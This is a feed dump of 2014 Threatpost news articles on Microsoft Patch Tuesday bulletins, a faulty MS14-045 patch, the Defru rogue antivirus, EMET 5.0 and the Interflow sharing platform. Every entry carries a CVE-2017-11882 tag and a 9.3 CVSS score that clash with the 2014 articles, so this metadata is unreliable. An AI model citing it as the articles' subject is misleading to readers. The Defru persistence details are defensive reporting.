Another bulletin patches a .NET denial-of-service vulnerability in Windows Server 2003, 2008 and 2012, and on the client-side OSes back to Vista.\n\nAnother denial-of-service bug is expected to be patched in Microsoft\u2019s Lync instant messaging and collaboration software.\n\n\u201cThe few number of patches expected out next week doesn\u2019t mean you can take a pass on patching this month however,\u201d cautions Russ Ernst, director, product management, Lumension.\n\nLast month, Microsoft patched IE with a [cumulative update that addressed 26 vulnerabilities](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) including one exploited in the wild. The news out of last month\u2019s batch of bulletins, however, was a faulty patch, MS14-045, that was [re-released after users complained of crashes and blue screens of death](<http://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>). The bulletin addressed vulnerabilities in kernel-mode drivers, and Microsoft blamed font issues for the system crashes.\n\nIn the meantime, Microsoft points out in a separate announcement that public vulnerability disclosures are approaching levels matching the first half of 2012, and that more than 4,000 disclosures have been made annually since the start of 2011. That number is still well shy of the 7,000 disclosed in the 2006-2007 timeframe, Microsoft said.\n\nFor the last half of 2013, for example, disclosures across the industry were up 6.5 percent from the start of the year, and up 12.6 percent from the second half of 2012. The severity of disclosures, however, is down. 
A little more than six percent of bugs scored 9.9 or greater on the CVSS standard in the second half of 2013, down from almost 13 percent in the first six months of the year.\n\n\u201cVulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses,\u201d wrote Microsoft\u2019s Tim Rains in the [report](<http://blogs.technet.com/b/security/archive/2014/09/03/industry-vulnerability-disclosures-trending-up.aspx>). \u201cA high-severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower-severity vulnerability that can be exploited more easily.\u201d\n\nDisclosures of medium- and low-complexity bugs, posing the highest risk to users, far outnumber disclosures of high-complexity vulnerabilities, Microsoft said.\n\nDisclosures in third-party applications such as media players or Web components such as Flash or Java continue to climb, up 34.4 percent in the latter half of 2013 and accounting for 58 percent of disclosures during that timeframe. Operating system vulnerability disclosures, meanwhile, were down 46 percent and accounted for 15 percent of total disclosures. Browser bugs were down 28 percent and made up 10 percent of overall disclosures.\n\nMicrosoft also examined disclosures for its products, 174 in the second half of 2013, up 2 percent from the first six months. 
Microsoft disclosures account for 7 percent of industry disclosures, down slightly from the start of the year.\n", "cvss3": {}, "published": "2014-09-04T15:07:28", "type": "threatpost", "title": "September 2014 Microsoft Patch Tuesday advance notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T19:07:28", "id": "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "href": "https://threatpost.com/patch-tuesday-includes-another-ie-update-vuln-disclosures-up/108098/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:15", "description": "Microsoft today re-released [security bulletin MS14-045](<http://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>), which was pulled shortly after the [August Patch Tuesday updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) because a number of users reported crashes and blue screens. The patch was removed from Windows Update on Aug. 15, three days after it was released as part of Microsoft\u2019s monthly patch cycle.\n\n\u201cAs soon as we became aware of some problems, we began a review and then immediately pulled the problematic updates, making these unavailable to download,\u201d said Tracey Pretorius, director, Trustworthy Computing at Microsoft. \u201cWe then began working on a plan to rerelease the affected updates.\u201d\n\n[MS14-045](<https://technet.microsoft.com/en-us/library/security/ms14-045.aspx>) patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit. Successful exploits could have led to an elevation of privileges on a compromised Windows machine.\n\nMicrosoft said at the time that a font issue patched in the update was the culprit causing the reported system crashes. 
Microsoft said that only a small number of computers were affected. There were other issues with the bulletin, the most serious causing systems to crash and render a 0x50 Stop error message after installation. Users were also seeing \u201cFile in Use\u201d error messages because of the font issue in question.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows. Windows Update users will get the patch automatically; otherwise, Microsoft urges users to install the update.\n\nThis month\u2019s updates had a distinct IE feel, with another cumulative update patching 26 vulnerabilities in Microsoft\u2019s flagship browser, including a publicly reported vulnerability that is likely being exploited in the wild. All 26 vulnerabilities were rated critical and could be remotely exploited.\n\nThe update came on the heels of an announcement at the start of the month alerting users that Microsoft would, in 18 months, no longer support older versions of the browser. With a rash of zero-days and high-profile exploits targeting older versions of IE, such as 6, 7 and 8, Microsoft made it clear that users should use only a current browser with modern memory exploit mitigations built in.\n\nMicrosoft also announced it would be [blocking older ActiveX controls in Internet Explorer](<http://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672>), starting with out-of-date versions of Java, another platform heavily targeted by hackers.\n\nThe next scheduled Patch Tuesday security bulletins release is set for Sept. 
9.\n", "cvss3": {}, "published": "2014-08-27T14:08:58", "type": "threatpost", "title": "Microsoft Re-Releases Broken Security Patch MS14-045", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T12:04:44", "id": "THREATPOST:2DAD0426512A1257D3D75569F282640E", "href": "https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:17", "description": "Rogue antivirus was once the scourge of the Internet, and [while this sort of malware is not entirely extinct](<http://threatpost.com/pro-syrian-malware-increasing-in-number-complexity/107814>), it\u2019s fallen out of favor among criminals as users have become more aware and security products have gotten better at blocking the threat.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015231/Rogue-AV-decline.png>)\n\n_Image via TechNet_\n\nHowever, Daniel Chipiristeanu, an antivirus researcher at the Microsoft Malware Protection Center (MMPC), claims that a simpler, and primarily browser-based, version of the fake antivirus scheme has proven more effective in recent months.\n\nThe MMPC says that once a user machine is compromised by one such piece of malware, Rogue:Win32/Defru, it blocks users from browsing to a long list of popular websites on the Internet and instead presents an image familiar to anyone who\u2019s dealt with rogue antivirus in the past.\n\n\u201cWhen the user is browsing the Internet, the rogue will use the hosts file to redirect links to a rather infamous specific fake website (pcdefender.<removed> IP 82.146.<removed>.21) that is often used in social engineering by fake antivirus malware,\u201d Chipiristeanu explained on Microsoft\u2019s TechNet blog.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015227/win32delfru.png>)\n\n_Image via TechNet_\n\nWhile the 
user will see the above image in their browser window, the URL in the address bar will be that of the website the user intended to visit in the first place. In other words, the malware quietly redirects the user to a new website, but the address bar does not reflect that movement. If the user tries to access another website, the threat follows. The message reads:\n\n\u201c_Detected on your computer malicious software that blocks access to certain Internet resources, in order to protect your authentication data from intruders the defender system Windows Security was forced to intervene.\u201d_\n\nThe fake scanner shows users a long list of non-existent malware it claims to have found on the computer in question. Then it offers to clean the system for a fee. If the user clicks the \u201cPay Now\u201d button, he will be redirected to a payment portal called \u201cpayeer.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2014/08/07015224/defru-payment.png>)\n\n_Image via TechNet_\n\nChipiristeanu claims that paying the fee will not fix the problem.\n\nAt the moment, most of Defru\u2019s victim-machines \u2013 as is indicated by language \u2013 appear to be located in Russia. The United States is a distant second to Russia with Kazakhstan following closely behind in third. The remaining infections are mostly in eastern European and Middle Eastern states with some infections in western Europe as well.\n\nYou can find the list of redirected sites with the [detailed Defru malware information](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Rogue:Win32/Defru#tab=2>).\n\n\u201cThe rogue is written in PHP, uses a PHP EXE compiler (Bambalam) and will copy itself to %appdata%\\w1ndows_<4chars>.exe (e.g. \u2018w1ndows_33a0.exe\u2019),\u201d Chipiristeanu explains. 
\u201cIt persists at system reboot by adding itself to the registry key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with the value \u2018w1ndows_<4chars>\u2019.\u201d\n\n\u201cThe user can clean their system by removing the entry value from the \u201crun\u201d registry key, deleting the file from disk and deleting the added entries from the hosts file.\u201d\n", "cvss3": {}, "published": "2014-08-20T13:59:20", "type": "threatpost", "title": "Fake AV Defru Puts New Spin on Rogue AV", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-25T18:42:59", "id": "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "href": "https://threatpost.com/a-new-spin-on-rogue-antivirus/107846/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:20", "description": "Microsoft today released its monthly [Patch Tuesday Security Bulletins](<https://technet.microsoft.com/library/security/ms14-aug>), and the top priority is another cumulative update for Internet Explorer; this one patches 26 vulnerabilities, including one that\u2019s been publicly reported, Microsoft said, and is likely being exploited. All of them are rated critical by Microsoft and allow for remote code execution should a user land on a malicious webpage using IE.\n\n\u201cIf you feel like you are constantly patching IE \u2013 you are,\u201d said Russ Ernst of Lumension. \u201cA cumulative update for the browser is now the rule more so than the exception.\u201d\n\nErnst\u2019s sentiments are no doubt being echoed in enterprise IT shops worldwide. Admins have to contend with a number of upcoming changes related to IE as well. Microsoft last week put the word out that users had [18 months to migrate to the latest version of Internet Explorer](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) for their respective versions of Windows before support would end. 
That would mean no more security updates for IE 6-8, older versions of the browser that lack built-in memory protections, making them such attractive targets for hackers and exploits.\n\nThe company followed that up last week with news that it would begin [blocking older ActiveX controls in IE](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>), starting with outdated versions of Java. That begins today, Microsoft said.\n\nThe point is that Microsoft is tired of IE being a punching bag, and it\u2019s going to force users\u2019 hands to upgrade to more secure versions of the browser and lessen the impact of targeted attacks and potential problems with [zero-days](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>) such as the one reported by HP\u2019s Zero Day Initiative in May.\n\n\u201cOutdated browsers represent a major challenge in keeping the Web ecosystem safer and more secure, as modern Web browsers have better security protection. 
Internet Explorer 11 includes features like Enhanced Protected Mode to help keep customers safer,\u201d said Roger Capriotti, director of Internet Explorer, in a [blog post](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) last week.\n\nToday\u2019s IE update, [MS14-051](<https://technet.microsoft.com/library/security/MS14-051>), includes a slew of memory corruption bugs, most of them use-after-free vulnerabilities that are quickly catching up to buffer overflows as attackers\u2019 favorite exploit target.\n\n\u201cRecent advances in the state of the art for DOM fuzzing have made it easier to find [use-after-free] bugs in web browsers as researchers have found it harder and harder to find and exploit more traditional buffer overflows,\u201d said Craig Young, security researcher at Tripwire.\n\nYoung said hackers can combine a use-after-free vulnerability with a number of other techniques to bypass memory protections built in to the browser.\n\n\u201cJavaScript engines running in all browsers make it much easier for attackers to control memory allocators and therefore gain reliable code execution,\u201d Young said. \u201cCombining this vulnerability with JavaScript based \u2018heap-spraying\u2019 attacks and DEP-bypass techniques provides attackers with an easy way to execute arbitrary code.\u201d\n\nMicrosoft also advises that users pay attention to out-of-band updates released today by Adobe that patch vulnerabilities in Flash Player, as well as [a zero-day being exploited in targeted attacks against Adobe Reader and Acrobat](<http://threatpost.com/adobe-patches-reader-zero-day-used-in-targeted-attacks/107721>).\n\nThe remaining critical bulletin released today by Microsoft addresses a remote code execution vulnerability in Windows Media Center. [MS14-043](<https://technet.microsoft.com/library/security/ms14-043>) would require a user to open a malicious Microsoft Office file that invokes a resource in the Media Center. 
This bulletin affects only Windows 7, 8 and 8.1 versions of Windows Media Center, as well as users of Windows Media Center TV Pack for Vista.\n\nThe final remote code execution vulnerability patched today, [MS14-048](<https://technet.microsoft.com/library/security/MS14-048>), is in Microsoft OneNote 2007 digital note-taking software. It\u2019s rated important because it requires user interaction to trigger an exploit.\n\nThe remaining bulletins are all rated important by Microsoft and include four privilege elevation vulnerabilities, and a pair of security feature bypass bugs.\n\n * [MS14-044](<https://technet.microsoft.com/library/security/MS14-044>) patches two vulnerabilities in Microsoft SQL Server Master Data Services and SQL Server relational database management system. Users would have to be lured to a website that injects client-side script into IE that would exploit the bug.\n * [MS14-045](<https://technet.microsoft.com/library/security/MS14-045>) fixes three vulnerabilities in Windows kernel-mode drivers where an attacker who is logged in to a computer and runs malicious code could elevate privileges.\n * [MS14-049](<https://technet.microsoft.com/library/security/MS14-049>) patches a vulnerability in Windows Installer Service that could be exploited if an attacker has valid credentials and runs a malicious application that tries to repair a previously installed app.\n * [MS14-050](<https://technet.microsoft.com/library/security/MS14-050>) is the final privilege escalation bug, and it\u2019s found in SharePoint Server. An authenticated attacker would need a malicious app running JavaScript in the user\u2019s context on a vulnerable SharePoint site to exploit the issue.\n * [MS14-046](<https://technet.microsoft.com/library/security/MS14-046>) and [MS14-047](<https://technet.microsoft.com/library/security/MS14-047>) are security feature bypass vulnerabilities in .NET Framework and LRPC. 
Both bugs require certain circumstances to be in place, but could lead to a bypass of Address Space Layout Randomization (ASLR) and remote code execution.\n", "cvss3": {}, "published": "2014-08-12T15:09:09", "type": "threatpost", "title": "August 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-12T19:09:09", "id": "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "href": "https://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:24", "description": "The latest version of Microsoft\u2019s freely available stopgap against zero-day exploits was released today with two new exploit mitigations and a batch of new configuration options.\n\nThe update to Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, comes six months after a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) was released in February during the RSA Conference. At that time Microsoft was touting new plug-in controls and memory protections, both of which have been rolled into [EMET 5.0](<http://blogs.technet.com/b/msrc/archive/2014/07/30/general-availability-for-enhanced-mitigation-experience-toolkit-emet-5-0.aspx>).\n\nThe first new mitigation is called Attack Surface Reduction (ASR). The mitigation allows Windows administrators to determine when\u2014or if\u2014plug-ins such as Java or Adobe Flash run at all on a Windows computer. Java and Flash, for example, have been favorite targets of hackers. 
Many advanced attacks exploit vulnerabilities in either platform, giving them an initial foothold on a system that can then be leveraged for further system and network access.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet. They can also block Office applications, for example, from loading Flash in a Word or Excel document, but allow it in the browser.\n\n\u201cWe heard from customers that they wanted more control over which programs and in which scenarios these plugins can be loaded. We initially released a Fix It tool last year to disable the Java plugin entirely in Internet Explorer and that helped people,\u201d said Jonathan Ness, principal security development manager for the Microsoft Security Response Center. \u201cBut customers told us that they still needed Java for their line-of-business applications running on their local intranet and were looking for a way to block Java and other plugins from loading on the wider untrusted Internet.\u201d\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming (ROP) exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. 
EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe other new mitigation in EMET 5.0 is called Export Address Table Filtering Plus (EAF+), which introduces two new methods aimed at disrupting advanced attacks, Microsoft said.\n\n\u201cFor example, EAF+ adds a new \u2018page guard\u2019 protection to help prevent memory read operations, commonly used as information leaks to build exploitations,\u201d Microsoft said in a statement.\n\n\u201cIt\u2019s the way EMET blocks common exploit techniques, common shell code techniques. The engineers building EMET are the same engineers in the security response center that respond to attacks in the wild against our software and these guys are always studying new attack techniques that show up in real-world exploits,\u201d Ness said. \u201cEAF+ amplifies the scope and robustness of EAF. It blocks new kinds of exploit techniques by performing additional integrity checks and preventing certain memory read operations used as \u2018read anywhere\u2019 primitives in recent exploits.\u201d\n\nMicrosoft has also tweaked the configuration options in EMET 5.0 allowing admins to further configure how mitigations protect applications in a particular IT environment.\n\n\u201cUsers can configure which specific memory addresses to protect with the HeapSpray Allocation mitigation using EMET 5.0,\u201d Microsoft said. \u201cWe continue to provide smart defaults for many of the most common applications used by our customers.\u201d\n\nMicrosoft said it has also simplified the way EMET configuration changes can be pushed via Group Policy in Active Directory.\n\n\u201cThey will no longer need to refresh the EMET configuration on each host or wait for an application refresh to make configuration changes to all hosts via group policy,\u201d Ness said. 
\u201cConfiguration changes will take effect right away with the addition of the EMET Service.\u201d\n\nMicrosoft has also added new services that help users monitor logs for suspicious activity, and has added improvements to its Certificate Trust feature where users are able to establish settings that block users from visiting websites with untrusted digital certificates.\n\n\u201cAll EMET users are going to benefit from the way we refactored many components of the EMET 5.0 engine to maximize application compatibility and reduce false positives, and from the work we did with popular anti-malware products to ensure application compatibility,\u201d Ness said.\n", "cvss3": {}, "published": "2014-07-31T14:41:35", "type": "threatpost", "title": "Microsoft Releases EMET 5.0 Exploit Mitigation Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-06T21:06:00", "id": "THREATPOST:985009AC9680D632153D78707A8949EF", "href": "https://threatpost.com/microsoft-releases-new-version-of-emet-exploit-mitigation-tool/107549/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Tomorrow\u2019s regularly scheduled [patch update](<https://technet.microsoft.com/library/security/ms14-jul>) from Microsoft includes \u2013 go figure \u2013 another cumulative rollup for Internet Explorer and a critical fix for a Windows remote code execution bug. More of the same for sure, but there\u2019s another bug being patched that may merit moving up a rung on your list of priorities.\n\nRated Moderate impact by Microsoft, a patch is expected for the [Microsoft Server Bus for Windows Server](<http://msdn.microsoft.com/en-us/library/dn282144.aspx>), a set of components that support messaging capabilities for Windows Azure, Microsoft\u2019s cloud-based application platform. 
Developers use these components when building, testing and running message-driven applications, Microsoft says.\n\nThe update will take care of a denial-of-service vulnerability in the service; the moderate rating is a step below Important, likely because local authentication is required to exploit the issue.\n\n\u201cMicrosoft Service Bus is a messaging service used by many third-party web applications as well as by Microsoft Azure, so even though this is rated as Moderate, it is probable that this vulnerability would be used in conjunction with other vulnerabilities to target those applications,\u201d said Russ Ernst of Lumension.\n\nThe Service Bus patch is one of six bulletins scheduled for tomorrow, two of which are rated critical and three rated important.\n\nThe IE rollup addresses remote-code execution vulnerabilities in the browser, Microsoft said. IE has been patched every month this year since February, including in June when a [six-month-old zero-day vulnerability was addressed in IE 8](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>).\n\n\u201cThe most critical patch to consider is Bulletin 1 is for all versions of Internet Explorer (IE), all the way from Internet Explorer 6, but only supported on Windows Server 2003 since XP has been retired, to the newest IE 11 on Windows 8.1 and R,\u201d said Qualys CTO Wolfgang Kandek. 
\u201cThis patch should be top of your list, since most attacks involve your web browser in some way.\u201d\n\nThe second critical vulnerability is another remote-code execution vulnerability that affects Windows on the client side back to Vista, Windows 7, 8 and RT and on the server side, all the way to Windows Server 2003.\n\nThe three remaining vulnerabilities are privilege escalation bugs in Windows that are rated Important, and cannot be exploited remotely.\n\n\u201cExploits for these types of vulnerabilities are part of the toolkit of any attacker as they are extremely useful, when the attacker gets an account on the machine, say through stolen credentials,\u201d Kandek said. \u201cIn any practical scenario, the attacker then wants to assure continued control of the machine and will need to become administrator of the machine to install their controlling malware. This is where these vulnerabilities come in \u2013 we consider these extremely important to fix to help frustrate or slow down attackers once they are on the target machine.\u201d\n\nMicrosoft has had a particularly newsworthy last 10 days, with the company involved in another [takedown of domains hosting malware](<http://threatpost.com/microsoft-says-technical-error-led-to-legitimate-no-ip-customers-losing-service/106977>), this time of No-IP domains, that also engulfed legitimate users, forcing Microsoft to go back and hurriedly filter out those domains and restore them.\n\n_[Image courtesy Rainer Stropek ](<https://www.flickr.com/photos/rainerstropek/>)_\n", "cvss3": {}, "published": "2014-07-07T10:10:49", "type": "threatpost", "title": "July 2014 Microsoft Patch Tuesday Security Bulletins Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-07-07T14:10:49", "id": "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "href": "https://threatpost.com/expect-ie-rollup-azure-service-bus-update-on-patch-tuesday/107029/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Much like the Year of PKI that has never come to be, information sharing has been one of security\u2019s more infamous non-starters. 
While successful in heavily siloed environments such as financial services, enterprises industry-wide are hesitant to share threat and security data for fear of [losing a competitive edge](<http://threatpost.com/share-and-share-alike-not-quite/100916>) or exposing further vulnerabilities.\n\nMicrosoft hopes the latest tweak to its Microsoft Active Protections Program (MAPP) will calm the waters a bit and engage companies and industries to [share threat data](<http://threatpost.com/adequate-attack-data-and-threat-information-sharing-no-longer-luxury-111512/77221>) in an effort to stem the effects of targeted and persistent attacks and speed up incident response recovery.\n\nA private preview is scheduled to open this week for [Microsoft Interflow](<http://www.microsoft.com/interflow>), a distributed platform for information exchange that is built on open specifications such as the Structured Threat Information eXpression ([STIX](<https://stix.mitre.org/>)), the Trusted Automation eXchange of Indicator Information ([TAXII](<https://taxii.mitre.org/>)), and the Cyber Observable eXpression standards ([CybOX](<http://cybox.mitre.org/>)). Today\u2019s announcement comes 11 months after Microsoft expanded MAPP, its vendor partner [information-sharing program to include incident responders](<http://threatpost.com/microsoft-expands-mapp-program-to-incident-response-teams/101524>).\n\n\u201cWe realized when we were building [MAPP for IR] that we needed a better way to automate the exchange of information with partners,\u201d said Jerry Bryant, senior security strategist, Microsoft Security Response Center.\n\nInterflow is built in Microsoft\u2019s Azure cloud-based application hosting platform, and organizations can use its management console to subscribe to different threat feeds, build a community of trusted partners with whom to share data, and set trust levels on those relationships, Bryant said. 
A watchlist feature allows companies to filter the potential thousands of [indicators of attacks](<http://threatpost.com/defenders-still-chasing-adequate-threat-intelligence-sharing/102904>) and threats they may receive, and those indicators can be configured to feed directly into an intrusion detection system, firewall or endpoint protection system, Bryant said.\n\n\u201cThe system is designed for end-to-end automation. We have APIs that can be used to subscribe to and process feeds into endpoint protection. It\u2019s designed to integrate with investments you\u2019ve already made,\u201d Bryant said. \u201cIf you\u2019re using SIEM to do analysis, this, through a plug-in architecture, plugs into that console. You can use it also for additional sets of data or build sets of data that you can share back out with partners.\u201d\n\nWhile Interflow\u2019s extensibility allows for customization of the feeds it processes, it will arrive with a number of feeds provided by Microsoft as well, ranging from malicious URLs used in attack campaigns, to detection guidance that can help partners write signatures. Those companies will also have the option of sending telemetry data back to Microsoft based on hits against those signatures once they\u2019re deployed, Bryant said.\n\nInterflow is not the only sharing platform to support STIX and TAXII; Bryant said Interflow is meant to be complementary to many of those platforms, including established one-to-many systems such as those used by the Financial Services Information Sharing and Analysis Center ([FS-ISAC](<https://www.fsisac.com/>)).\n\n\u201cWe\u2019re making sure our system talks to theirs,\u201d Bryant said of ISACs. \u201cThey have valuable data sets for those communities and valuable information for us. 
We can send them indicators [of compromise] and they can send telemetry to us that improves our responses and drive decision-making for out-of-band patches, for example.\u201d\n\nTelemetry exchange is not required, however, Bryant said.\n\n\u201cCompanies will establish their own communities they want to share with. We want to be in their communities and we will make feeds available, but they don\u2019t have to share back with us.\n\n\u201cWe talked to CISOs, and some don\u2019t like the idea of having to share their data back with a private organization. We don\u2019t require that; we just want to facilitate more sharing in the industry.\u201d\n\nBryant said anonymization and data sanitation capabilities are on the Interflow road map. For now, Microsoft has not set a general availability timeline for Interflow.\n\n\u201cPeople are getting more interested in sharing more of their own information. Obviously, there\u2019s a lot of hesitancy, but you can start out cautiously with Interflow and develop tight circles,\u201d Bryant said. \u201cThat\u2019s part of what we\u2019re trying to do is facilitate the next level of sharing and enable bidirectional sharing and connecting of systems. Our goal is to break down barriers and get more data flowing in the industry. 
Today, the way it works is not keeping up with threats.\u201d\n", "cvss3": {}, "published": "2014-06-23T09:03:23", "type": "threatpost", "title": "Microsoft Interflow Information-Sharing Platform Preview Open", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-24T13:04:01", "id": "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "href": "https://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "description": "Prompted by the disclosure of a [zero-day vulnerability in Internet Explorer 8](<http://threatpost.com/microsoft-working-on-patch-for-ie-8-zero-day/106247>) more than six months after it was reported, Microsoft next Tuesday will finally issue a patch.\n\nHP\u2019s Zero Day Initiative (ZDI) released on May 21 some detail on a previously unreported use-after-free bug in IE 8. 
No public exploits were reported and while Microsoft acknowledged receipt of the vulnerability report from ZDI, it had not produced a patch prior to ZDI\u2019s disclosure per its guidelines.\n\nThe vulnerability affects only IE 8, which lacks some of the exploit mitigations in later versions of the browser. Microsoft said in May that it was aware of the issue.\n\n\u201cSome fixes are more complex than others, and we must test every one against a huge number of programs, applications and different configurations,\u201d a Microsoft spokesperson said. \u201cWe continue to encourage customers to upgrade to a modern operating system, such as Windows 7 or 8.1, and run the latest version of Internet Explorer which include further protections.\u201d\n\nThe IE patch is one of two bulletins Microsoft has rated critical for next week\u2019s [Patch Tuesday security updates](<https://technet.microsoft.com/en-us/library/security/MS14-JUN>). There will be seven bulletins in all, five rated important by the company. The IE patch will likely be a cumulative rollup as it affects the browser all the way back to IE 6 on Windows Server 2003.\n\nThe second critical bulletin is also a remote code execution vulnerability, this one in Microsoft Office and Microsoft Lync, the company\u2019s messaging and video conferencing application. 
The vulnerability is rated critical for Lync 2013 and 2010, as well as Live Meeting 2007 Console; it is rated important for Microsoft Office 2010 and Office 2007.\n\n\u201cGiven that the second bulletin will affect Lync Server and the older Live Meeting Console this may be a truly remotely exploitable vulnerability,\u201d said Ross Barrett, senior manager of security engineering at Rapid7.\n\nWindows Server 2003, it should be noted, has nearly entered its last year of support; it\u2019s scheduled to go end-of-life in July 2015.\n\n\u201cWe are coming up on just a year out now and because any changes to your server will likely be a significant amount of work, it isn\u2019t too soon to get started on that plan,\u201d said Russ Ernst, director, product management, Lumension.\n\nThe remaining bulletins, all rated important, include a remote code execution bug in Office, separate information disclosure vulnerabilities in Windows and Lync Server, a denial-of-service vulnerability in Windows, and a tampering vulnerability in Windows.\n\n\u201cThe tampering label on the seventh bulletin may suggest it allows a message to be altered in transit,\u201d Barrett said. 
